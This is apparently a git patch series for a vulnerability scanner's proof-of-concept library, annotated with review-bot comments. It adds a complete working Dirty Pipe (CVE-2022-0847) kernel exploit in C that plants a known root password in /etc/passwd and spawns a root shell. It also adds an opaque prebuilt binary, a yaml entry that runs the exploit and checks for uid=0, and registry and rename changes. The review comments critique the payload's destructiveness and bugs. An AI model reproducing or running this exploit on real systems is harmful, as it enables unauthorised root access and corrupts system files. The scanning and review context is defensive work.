z(1W1Upo5^4mRdx3j_whj!3NJg3+C01d*(F|PJ1Jl-Y*vEnZ&8Qz7VUSK>GU-Q#<*t zYv`AR0mFEyC1(a>hLOo{GL&uo$tB1 zdR^AF^bozGv_)KRBF5BeQ-wKBdpU_J~#){H{Vto8Oy&_Uq#^{W)#zT9qs z+bwXr1#Y*%?H0J*0*)5o{bk-yR<9j+U$+vibSUjpo1wJuqBN{FBYBUP_pR@-#HH^F zcPpOvukUrq-@jE%5_Cd6%z01Or!u^kJE7#f_qtF8$a}7h%I`8onP4R)Q@slbLekY>$H%h!m%;nRvn-c5cbwt(=#YqTDWXTUIe^>^xT-r@3 z{vjpDT2IQk9#ZKyc;WB8ZkNxgioKxdw-tR^(Q}IaOwqR#y{_n7)lth8{g|Sg6zx>> z2}Prd9#-@@MPE?#+lsp5{4k!shdjJ}`xdRKr#G80v)X3wMz62=!K~!geQI5+*SBG< zg?^YnlG7I+{;qG=r|(7lJ=}>`36lq&O;CmJLOkwmF#OjD9`8yFZ`++-K zz$)Po@I`YzBKUd3^=PQ&;pHCLgnSCFftDyh$3i!1OIBnvT>#rpk zht!_#_*VjVwt&?fZNOJKTE=3&DE-fVe)Uus=kx`-?D?2*+RT{QXw(}PGsjDU=0FgK zTM`DHiHRhGeeq;(C?1Sp4>J=CWd{Xz7gKS=G$P*3o7!5-E79qfSTK}MhlYYi!b}f| zXgV}t1S8pjfgw8iGQ$O-X*yK5KM`nN?_0mV+1I*ZGh$1njZ`RY1m&5XUc_spy&KlA zqoOPB6^?R3J5^6Oo6SoDdy$aw4;iFuBDPvvm{+&E`Cp6pUn& z!G3H?)0w5NUC@fe62WW++xxZ_rlA1dIv3^k-kZrN=X`uho}QBDxtzMzxh^M0C%~MD zby~}b1%o(U#p8*NU6nmcIF5^7VYO;EP+#ADdEM} z4a4j2=xR1YeTwT#WWBxF7>;trBEm~te<;&0ypf><{8`jYTav>@I)lx92NQ%WZNx)l zpmM3WDZH}by~uj|l3-0^5Ldc~p_G(E(QEXpyS6_9C(K!<*6nLqa2_Ru24Z2vL?hXY z-VFoEfy%$)ZBfoNThM<(8htkkM9OnF_d#8Q{@MDNFs*1~Mh>l~&UWcI|*ImXr@ zW4Gt^5YyGHsHoe12XK6PNOJinRE8@?VEN zty$?FqQvVdKA-Q_XP)Ul!iLsxY|s0Nz7^zcX1rP44A1ue3ITNy+w=OK|Nnvi&w;y< z?YJLleM>`(?Rg)di4M#l@%>|Qv&(-Q0=s=_U7=YPT#nnG`6*;5CN7`%6&f^4LvuM$ zuqDLxef+3=UkR}?Y`@lplP)DYbqz5oZ`ULd4XVNDIpf8T+mGi@8s8kdWno=+H(B&) ZmypY4UAkRdDpK?lwcxqMii*1J{}<`-+G79! literal 0 HcmV?d00001 diff --git a/data/KernelPocs/CVE-2022-0847/CVE-2022-0847.c b/data/KernelPocs/CVE-2022-0847/CVE-2022-0847.c new file mode 100644 index 0000000..a1efbfe --- /dev/null +++ b/data/KernelPocs/CVE-2022-0847/CVE-2022-0847.c 
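Review bot: A prebuilt ELF `data/KernelPocs/CVE-2022-0847/CVE-2022-0847` (13328 bytes, the binary literal above) is committed next to the source, and the yaml in this patch runs that binary (`Exec : CVE-2022-0847`), not the .c; nobody reviewing the patch can confirm the binary was built from the .c shown, and it will only run on whatever architecture and libc it was linked against. Either compile from the .c at scan time as part of the Exec step, or at minimum record the build command and a SHA-256 of the binary in the yaml so it can be reproduced and verified.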
@@ -0,0 +1,179 @@ +/* SPDX-License-Identifier: GPL-2.0 */ +/* + * Copyright 2022 CM4all GmbH / IONOS SE + * + * author: Max Kellermann + * + * Proof-of-concept exploit for the Dirty Pipe + * vulnerability (CVE-2022-0847) caused by an uninitialized + * "pipe_buffer.flags" variable. It demonstrates how to overwrite any + * file contents in the page cache, even if the file is not permitted + * to be written, immutable or on a read-only mount. + * + * This exploit requires Linux 5.8 or later; the code path was made + * reachable by commit f6dd975583bd ("pipe: merge + * anon_pipe_buf*_ops"). The commit did not introduce the bug, it was + * there before, it just provided an easy way to exploit it. + * + * There are two major limitations of this exploit: the offset cannot + * be on a page boundary (it needs to write one byte before the offset + * to add a reference to this page to the pipe), and the write cannot + * cross a page boundary. + * + * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n' + * + * Further explanation: https://dirtypipe.cm4all.com/ + */ + +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include + +#ifndef PAGE_SIZE +#define PAGE_SIZE 4096 +#endif + +/** + * Create a pipe where all "bufs" on the pipe_inode_info ring have the + * PIPE_BUF_FLAG_CAN_MERGE flag set. + */ +static void prepare_pipe(int p[2]) +{ + if (pipe(p)) abort(); + + const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ); + static char buffer[4096]; + + /* fill the pipe completely; each pipe_buffer will now have + the PIPE_BUF_FLAG_CAN_MERGE flag */ + for (unsigned r = pipe_size; r > 0;) { + unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r; + write(p[1], buffer, n); + r -= n; + } + + /* drain the pipe, freeing all pipe_buffer instances (but + leaving the flags initialized) */ + for (unsigned r = pipe_size; r > 0;) { + unsigned n = r > sizeof(buffer) ? 
sizeof(buffer) : r; + read(p[0], buffer, n); + r -= n; + } + + /* the pipe is now empty, and if somebody adds a new + pipe_buffer without initializing its "flags", the buffer + will be mergeable */ +} + +int main() { + const char *const path = "/etc/passwd"; + + printf("Backing up /etc/passwd to /tmp/passwd.bak ...\n"); + FILE *f1 = fopen("/etc/passwd", "r"); + FILE *f2 = fopen("/tmp/passwd.bak", "w"); + + if (f1 == NULL) { + printf("Failed to open /etc/passwd\n"); + exit(EXIT_FAILURE); + } else if (f2 == NULL) { + printf("Failed to open /tmp/passwd.bak\n"); + fclose(f1); + exit(EXIT_FAILURE); + } + + char c; + while ((c = fgetc(f1)) != EOF) + fputc(c, f2); + + fclose(f1); + fclose(f2); + + loff_t offset = 4; // after the "root" + const char *const data = ":$1$antx-soc$pIwpJwMMcozsUxAtRa85w.:0:0:test:/root:/bin/sh\n"; // openssl passwd -1 -salt antx-soc antx-soc + printf("Setting root password to \"antx-soc\"...\n"); + const size_t data_size = strlen(data); + + if (offset % PAGE_SIZE == 0) { + fprintf(stderr, "Sorry, cannot start writing at a page boundary\n"); + return EXIT_FAILURE; + } + + const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1; + const loff_t end_offset = offset + (loff_t)data_size; + if (end_offset > next_page) { + fprintf(stderr, "Sorry, cannot write across a page boundary\n"); + return EXIT_FAILURE; + } + + /* open the input file and validate the specified offset */ + const int fd = open(path, O_RDONLY); // yes, read-only! 
:-) + if (fd < 0) { + perror("open failed"); + return EXIT_FAILURE; + } + + struct stat st; + if (fstat(fd, &st)) { + perror("stat failed"); + return EXIT_FAILURE; + } + + if (offset > st.st_size) { + fprintf(stderr, "Offset is not inside the file\n"); + return EXIT_FAILURE; + } + + if (end_offset > st.st_size) { + fprintf(stderr, "Sorry, cannot enlarge the file\n"); + return EXIT_FAILURE; + } + + /* create the pipe with all flags initialized with + PIPE_BUF_FLAG_CAN_MERGE */ + int p[2]; + prepare_pipe(p); + + /* splice one byte from before the specified offset into the + pipe; this will add a reference to the page cache, but + since copy_page_to_iter_pipe() does not initialize the + "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */ + --offset; + ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0); + if (nbytes < 0) { + perror("splice failed"); + return EXIT_FAILURE; + } + if (nbytes == 0) { + fprintf(stderr, "short splice\n"); + return EXIT_FAILURE; + } + + /* the following write will not create a new pipe_buffer, but + will instead write into the page cache, because of the + PIPE_BUF_FLAG_CAN_MERGE flag */ + nbytes = write(p[1], data, data_size); + if (nbytes < 0) { + perror("write failed"); + return EXIT_FAILURE; + } + if ((size_t)nbytes < data_size) { + fprintf(stderr, "short write\n"); + return EXIT_FAILURE; + } + + char *argv[] = {"/bin/sh", "-c", "(echo antx-soc; cat) | su - -c \"" + "echo \\\"Restoring /etc/passwd from /tmp/passwd.bak...\\\";" + "cp /tmp/passwd.bak /etc/passwd;" + "echo \\\"Done! Popping shell... (run commands now)\\\";" + "/bin/sh;" + "\" root"}; + execv("/bin/sh", argv); + + printf("system() function call seems to have failed :(\n"); + return EXIT_SUCCESS; +} \ No newline at end of file diff --git a/data/KernelPocs/CVE-2022-0847/CVE-2022-0847.yaml b/data/KernelPocs/CVE-2022-0847/CVE-2022-0847.yaml new file mode 100644 index 0000000..5f3a839 --- /dev/null +++ b/data/KernelPocs/CVE-2022-0847/CVE-2022-0847.yaml 
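Review bot: The payload in this C hunk is destructive and its recovery path is fragile: it writes a 59-byte record at offset 4 of /etc/passwd, longer than the stock `root:x:0:0:root:/root:/bin/bash` line, so the following entry is partially overwritten too, and the only restore is `cp /tmp/passwd.bak /etc/passwd` run through `su` with the planted password. If `su` is unavailable, PAM rejects the login, or /etc/passwd sits on a read-only mount (the page-cache write succeeds there, the `cp` does not), the host is left with root password `antx-soc` and corrupted entries. The backup loop `char c; while ((c = fgetc(f1)) != EOF)` must use `int c`; with a signed `char` any 0xFF byte in the file is mistaken for EOF and the backup is truncated before it is ever restored. Given `PocHazardLevel: high` in the yaml, this should be a version-gated check (kernel >= 5.8 per the source header, below the fixed stable releases) with the overwrite only run manually, which is what the usage doc in this series says happens for destructive kernel PoCs. Minor: the message after `execv` says `system() function call seems to have failed`, which misnames the call.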
@@ -0,0 +1,38 @@ +FormatVer: 20230308 +Id: CVE-2022-0847 +Belong: kernel +PocHazardLevel: high +Source: https://github.com/antx-code/CVE-2022-0847 +SiteInfo: + Name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核 + Severity: high + Description: + DirtyPipe是自 内核版本5.8 以来 Linux 内核中的一个漏洞,允许覆盖任意只读文件中的数据。这会导致特权提升,因为非特权进程可以将代码注入根进程。 + ScopeOfInfluence: + Linux kernel < 5.17-rc6. + References: + - https://nvd.nist.gov/vuln/detail/cve-2022-0847 + - https://packetstormsecurity.com/files/166229/Dirty-Pipe-Linux-Privilege-Escalation.html + SiteClassification: + CvssMetrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + CvssScore: 7.8 + CveId: CVE-2022-0847 + CweId: CWE-665, CWE-281 + CnvdId: None + KveId: None + Tags: + - 权限提升 +SiteRequests: + Implement: + ImArray: + - inter: + InterArgs : + Exec : CVE-2022-0847 + Args : + ExpireTime: 30 + Inter: + - ">.:>>" + - "<<:id\n" + - ">.:\n" + - ">?:uid=0(root)" + Condition: None \ No newline at end of file From 8040010b7ae61d56295cb75787cacadf529dcd31 Mon Sep 17 00:00:00 2001 From: Amon_S1eepy <12577316+amon-s1eepy@user.noreply.gitee.com> Date: Thu, 9 Mar 2023 00:01:35 +0000 Subject: [PATCH 11/13] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20da?= =?UTF-8?q?ta/KernelPocs/CVE-2022-0847/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- data/KernelPocs/CVE-2022-0847/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 data/KernelPocs/CVE-2022-0847/.keep diff --git a/data/KernelPocs/CVE-2022-0847/.keep b/data/KernelPocs/CVE-2022-0847/.keep deleted file mode 100644 index e69de29..0000000 From 8b67eb3ba4c85ff36ff9b3957482bee0a8c88b77 Mon Sep 17 00:00:00 2001 From: yangjipeng Date: Thu, 9 Mar 2023 11:29:14 +0800 Subject: [PATCH 12/13] Update info for Kernel and System main Pocs yaml file. --- data/KernelPocs/KernelPocs.yaml | 1 + data/SystemPocs/SystemPocs.yaml | 3 ++- 2 files changed, 3 insertions(+), 1 deletion(-) 
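Review bot: The `Inter` sequence in this hunk opens with `>.:>>`, but CVE-2022-0847.c never prints a `>>` prompt (its output is `Backing up ...`, `Setting root password ...`, then the su wrapper's `Restoring ...` and `Done! Popping shell...`), so the harness waits out `ExpireTime: 30` and never sends `id`; the line was copied from the Redis entry. Wait on `Popping shell` (or drop the wait) before `<<:id\n`. Other points in the same hunk: the key is `- inter:` (lowercase, empty) where the other entries use `- Inter : bash`, so confirm the loader treats an empty interpreter as direct execution rather than silently skipping the item; `CweId: CWE-665, CWE-281` is a comma scalar where other files carry one ID or `None`; and `ScopeOfInfluence: Linux kernel < 5.17-rc6` omits the lower bound (5.8, per the source header) and should name the fixed stable releases (5.16.11, 5.15.25, 5.10.102) rather than an -rc tag, since hosts run stable series.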
diff --git a/data/KernelPocs/KernelPocs.yaml b/data/KernelPocs/KernelPocs.yaml index 1629446..ab60342 100644 --- a/data/KernelPocs/KernelPocs.yaml +++ b/data/KernelPocs/KernelPocs.yaml @@ -4,3 +4,4 @@ ExplorerItems: - ConfigFile: CVE-2021-22555/CVE-2021-22555.yaml - ConfigFile: CVE-2022-2588/CVE-2022-2588.yaml - ConfigFile: CVE-2022-2639/CVE-2022-2639.yaml + - ConfigFile: CVE-2022-0847/CVE-2022-0847.yaml \ No newline at end of file diff --git a/data/SystemPocs/SystemPocs.yaml b/data/SystemPocs/SystemPocs.yaml index 66408bf..3a45e12 100644 --- a/data/SystemPocs/SystemPocs.yaml +++ b/data/SystemPocs/SystemPocs.yaml @@ -12,4 +12,5 @@ ExplorerItems: - ConfigFile: CVE-2021-4043/CVE-2021-4043.yaml - ConfigFile: CVE-2021-3156/CVE-2021-3156.yaml - ConfigFile: CVE-2022-0351/CVE-2022-0351.yaml - - ConfigFile: CVE-2023-22809/CVE-2023-22809.yaml \ No newline at end of file + - ConfigFile: CVE-2023-22809/CVE-2023-22809.yaml + - ConfigFile: CVE-2022-0543/CVE-2022-0543.yaml \ No newline at end of file From 1586ae0bcf54c2ebb13bfc4f95928ae6b3135e92 Mon Sep 17 00:00:00 2001 From: kascas Date: Thu, 9 Mar 2023 13:39:10 +0800 Subject: [PATCH 13/13] correct CVE-2021-4043 to CVE-2021-4034 --- .../{CVE-2021-4043 => CVE-2021-4034}/CVE-2021-4034.py | 0 .../CVE-2021-4043.yaml => CVE-2021-4034/CVE-2021-4034.yaml} | 0 data/SystemPocs/SystemPocs.yaml | 2 +- 3 files changed, 1 insertion(+), 1 deletion(-) rename data/SystemPocs/{CVE-2021-4043 => CVE-2021-4034}/CVE-2021-4034.py (100%) rename data/SystemPocs/{CVE-2021-4043/CVE-2021-4043.yaml => CVE-2021-4034/CVE-2021-4034.yaml} (100%) diff --git a/data/SystemPocs/CVE-2021-4043/CVE-2021-4034.py b/data/SystemPocs/CVE-2021-4034/CVE-2021-4034.py similarity index 100% rename from data/SystemPocs/CVE-2021-4043/CVE-2021-4034.py rename to data/SystemPocs/CVE-2021-4034/CVE-2021-4034.py 
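Review bot: Registering `CVE-2022-0847/CVE-2022-0847.yaml` in `KernelPocs.yaml` puts an entry with `PocHazardLevel: high` (it rewrites /etc/passwd) into the list that `go run main.go -kernel=all` executes, which contradicts the usage doc in this series saying destructive kernel PoCs are only version-matched and run by hand; either the loader must skip `high` entries unless explicitly requested, or this entry should not be in the default list. Both hunks here also show the same missing trailing newline (`\ No newline at end of file`), turning each one-line addition into a two-line diff.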
diff --git a/data/SystemPocs/CVE-2021-4043/CVE-2021-4043.yaml b/data/SystemPocs/CVE-2021-4034/CVE-2021-4034.yaml similarity index 100% rename from data/SystemPocs/CVE-2021-4043/CVE-2021-4043.yaml rename to data/SystemPocs/CVE-2021-4034/CVE-2021-4034.yaml diff --git a/data/SystemPocs/SystemPocs.yaml b/data/SystemPocs/SystemPocs.yaml index 3a45e12..53c05b9 100644 --- a/data/SystemPocs/SystemPocs.yaml +++ b/data/SystemPocs/SystemPocs.yaml @@ -9,7 +9,7 @@ ExplorerItems: - ConfigFile: CVE-2022-1292/CVE-2022-1292.yaml - ConfigFile: CVE-2021-44142/CVE-2021-44142.yaml - ConfigFile: CVE-2021-3560/CVE-2021-3560.yaml - - ConfigFile: CVE-2021-4043/CVE-2021-4043.yaml + - ConfigFile: CVE-2021-4034/CVE-2021-4034.yaml - ConfigFile: CVE-2021-3156/CVE-2021-3156.yaml - ConfigFile: CVE-2022-0351/CVE-2022-0351.yaml - ConfigFile: CVE-2023-22809/CVE-2023-22809.yaml
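Review bot: The rename in this patch is content-preserving (`similarity index 100%`), so only the path and the `ConfigFile:` entry change; if the old `CVE-2021-4043.yaml` carried the wrong identifier inside (`Id:`, `CveId:`, `References:`), those fields are still wrong after this patch. Open the renamed file and confirm every ID reads CVE-2021-4034 (pkexec) before merging.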